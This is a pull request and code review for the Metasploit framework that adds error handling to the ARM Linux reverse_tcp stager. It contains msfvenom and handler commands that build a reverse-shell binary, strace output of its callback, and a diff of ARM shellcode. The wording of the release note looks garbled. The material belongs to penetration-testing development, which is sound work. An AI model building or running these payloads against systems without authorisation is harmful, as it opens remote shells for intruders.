### PR TITLE
Add error handling to ARM linux reverse tcp stager

### PR DESCRIPTION
**Pull request by tkmru**
I add error handling to arm linux reverse tcp stager. for [Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/7722).

## Verification

List the steps needed to make sure this thing works

- [x] ./msfconsole -qx "use exploit/multi/handler; set payload linux/armle/meterpreter/reverse_tcp; set lhost IP_ADDR; set lport PORT_NUMBER; set ExitOnSession false; run -j"
- [x] follow commands
```
$ ./msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 -f elf -o ./reverse_tcp
$ sudo chmod +x ./reverse_tcp
$ strace ./reverse_tcp 
execve("./reverse_tcp", ["./reverse_tcp"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(6666), sin_addr=inet_addr("192.168.0.1")}, 16) = -1 ETIMEDOUT (Connection timed out)
exit(1)                                 = ?
```

### CODE REVIEW

**Comment by timwr** [comment]
It's possible I'm doing something stupid but this isn't opening a valid session for me anymore (with the handler started):
```
execve("./elf", ["./elf"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.0.1")}, 16) = 0
recv(3, "\210\0\0\0", 4, 0)             = 4
mmap2(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_EXECUTABLE, -1, 0) = 0xb6f0b000
exit(1)
```
It might also be worth also updating the original assembly here:
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/linux/armle/stager_sock_reverse.s

**Comment by tkmru** [comment]
It's my misstake. sorry. I fix it later.

File: modules/payloads/stagers/linux/armle/reverse_tcp.rb [hunk 1]
```diff
@@ -34,56 +34,74 @@ def initialize(info = {})
...
+            0xe0811002,          #        add     r1, r1, r2        ; set 0x1000 to r1
+            0xe3a070c0,          #        mov     r7, #192          ; set 192(0xC0) to r7
+            0xe3e00000,          #        mvn     r0, #0            ; set 0xffffffff to r0
+            0xe3a02007,          #        mov     r2, #7
+            0xe59f3078,          #        ldr     r3, [pc, #120]    ; set r3 to 0x1022
+            0xe1a04000,          #        mov     r4, r0
+            0xe3a05000,          #        mov     r5, #0
+            0xef000000,          #        svc     0x00000000        ; invoke mmap2
+            0xe3500000,          #        cmp     r0, #0
+            0xba000012,          #        blt 817c <failed>
```
Comment (busterb) [inline modules/payloads/stagers/linux/armle/reverse_tcp.rb]: doesn't mmap return a pointer? you'd want a beq here I think, not a blt

**Comment by timwr** [comment]
Excellent work @tkmru many thanks :+1:

**Comment by tkmru** [comment]
@timwr many thanks for supporting me.

**Comment by alrosenthal-r7** [comment]
# Release Notes

This fix resolves inadequate error handling in the payloads/stagers/linux/armle/reverse_tcp module, which caused the module to crash. Every crash is logged, so you can now use the module quietly.

**Pull request merged**